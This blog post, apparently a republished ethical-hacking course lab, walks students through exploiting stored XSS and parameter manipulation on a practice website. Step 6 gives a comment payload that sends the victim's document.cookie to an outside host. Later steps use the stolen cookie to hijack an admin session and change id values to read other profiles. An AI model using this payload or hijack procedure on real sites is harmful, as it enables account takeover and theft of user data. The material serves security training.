Powered by Blogger.
Home » » Module 08: Web Application Penetration Testing Methodology 4

Module 08: Web Application Penetration Testing Methodology 4

Written By AKADEMY on Thursday, July 4, 2019 | 10:10 PM

Exercise 4: Pentesting Web Application for Stored XSS and Parameter Manipulation Vulnerabilities

Scenario

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored Cross-Site scripting attacks are persistent attacks which are implanted on the target server unless its existence is detected and removed. When an employee in an organization unknowingly becomes victim to this script, attackers gain the session ID corresponding to the victim, and thereby attaining the victim's session without legitimately logging in to the web application. As an Ethical hacker or a Penetration Tester, you need to safeguard a website from executing such malicious scripts and thereby protect the user sessions from being stolen.
The objective of this lab is to help students learn how to:
  • Test web applications for vulnerabilities
  • Use Firebug to hijack a session
Lab Duration30 Minutes
  1. Click Windows 8.1 (External Network) and click Ctrl+Alt+Delete.
    Screenshot
  2. In the password field, click Pa$$w0rd and press Enter.
    Screenshot
  3. Launch Firefox web browser, type the URL http://www.moviescope.com in the address bar and press Enter.
    moviescope login/home page will appear as shown in the screenshot.
    Screenshot
  4. Log in to MovieScope assuming that you are a user. Use the following credentials to log in to the website:
    Username: steve
    Password: test
    Screenshot
  5. You are logged in as a general user and note that you do not have any admin privileges. Click on Blog tab.
    Screenshot
  6. Blog page appears; scroll down to Leave a Comment section, enter the following query in the Comment field and click Submit Comment.
    <a onclick="document.location='http://www.oceanplaza.com/Default.aspx?cookie='+escape(document.cookie);" href="#"> Please click here to visit website </a>
    Screenshot
  7. A comment link will be posted stating “Please click here to visit website” (as we have stated this comment in the query posted in the previous task).
    Now, whenever a user who has logged in to the website visits this webpage (Blogwebpage) and clicks on the link, the malicious script running behind the link gets activated, and immediately the cookie value is stored in a file named Mycookies.txt in the location C:\inetpub\wwwroot\oceanplaza\CookieSteal.
    Screenshot
  8. Click Windows Server Subnet C and click Ctrl+Alt+Delete.
    Screenshot
  9. In the login window, enter the following credentials and press Enter:
    User Name: Administrator
    Password: Pa$$w0rd
    Screenshot
  10. Click on Close button at the top right corner of the Server Manager window.
    Screenshot
  11. Launch Firefox browser, type the URL http://www.moviescope.com in the address bar and press Enter.
    moviescope login/home page appears as shown in the screenshot.
    Screenshot
  12. Assume that you are the admin user and log in to the website using the following credentials:
    Username: sam
    Password: test
    Screenshot
  13. You are logged in as an admin user and you can notice that the webpage displays your role (Admin) adjacent to Logout. Click on Blog tab:
    Screenshot
  14. Blog webpage appears on the browser window. Scroll down the page and click Please click here to visit website link.
    Screenshot
  15. The admin (victim) is redirected to Default.aspxwebpage of oceanplaza website. Click here link.
    In real-time, seeing the blank/unavailable webpage, the user clicks here link to go back to the previous page, being unaware of the fact that an attack has been performed to steal the cookie.
    Screenshot
  16. You will be redirected to the Blog webpage of moviescope website as shown in the screenshot.
    Do not log out of the website as long as you perform this lab.
    Screenshot
  17. Click Windows 8.1 (External Network).
    Screenshot
  18. Minimize the web browser, navigate to the location C:\inetpub\wwwroot\oceanplaza\CookieStealand double-click Mycookies.txt file.
    Screenshot
  19. The text file contains cookies of the target user's authenticated session as shown in the screenshot.
    Screenshot
  20. Switch to the web browser and click View Profiletab. Note that steve is a normal user (here, you) and not an admin.
    Screenshot
  21. You will observe that steve’s profile is displayed on the webpage. Now, click Firebug icon located at the top-right corner of the browser window.
    Screenshot
  22. Firebug panel appears at the lower end of the screen, click Cookies tab and then click Enablelink.
    Screenshot
  23. You will be able to observe a list of cookies. Note that you need to change that cookie value, whose status under Expires tab is mentioned as Session.
    Screenshot
  24. Right-click mscope link and select Edit.
    Screenshot
  25. As already mentioned, an Edit Cookie pop-up appears; and cookie name (mscope) is constant for the website. Enter the cookie value that you have observed in Mycookies.txt file and click OK.
    Screenshot
  26. The cookie value is changed as shown in the screenshot.
    Screenshot
  27. Now, refresh the web page and then click powerbutton at the right side corner of the firebug panel to de-activate the firebug add-on.
    Screenshot
  28. You will observe that the user name has changed to sam (admin) and you have logged in to his session. Click View Profile tab.
    Screenshot
  29. The profile of sam appears as shown in the screenshot.
    Screenshot
  30. In Sam's profile page, you will observe that the value of ID in the address bar is 1.
    Now, try to change the parameter to id=2 in the address bar, and press Enter.
    You will get the profile for John without having to perform any SQL Injection techniques to explore the databases.
    Screenshot
  31. Now, change the parameter to id=3 in the address bar and press Enter.
    You will get the profile for kety.
    This way, you can attempt to change the id number and obtain user profile information.
    Screenshot
  32. In this lab, it is evident that:
    • The website is vulnerable to stored XSS and
    • The cookie value is not encrypted and is available in plain text
    • The website is unable to block Parameter Manipulation
In this lab, you have learned how to:
  • Test web applications for vulnerabilities
  • Use Firebug to hijack a session
Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT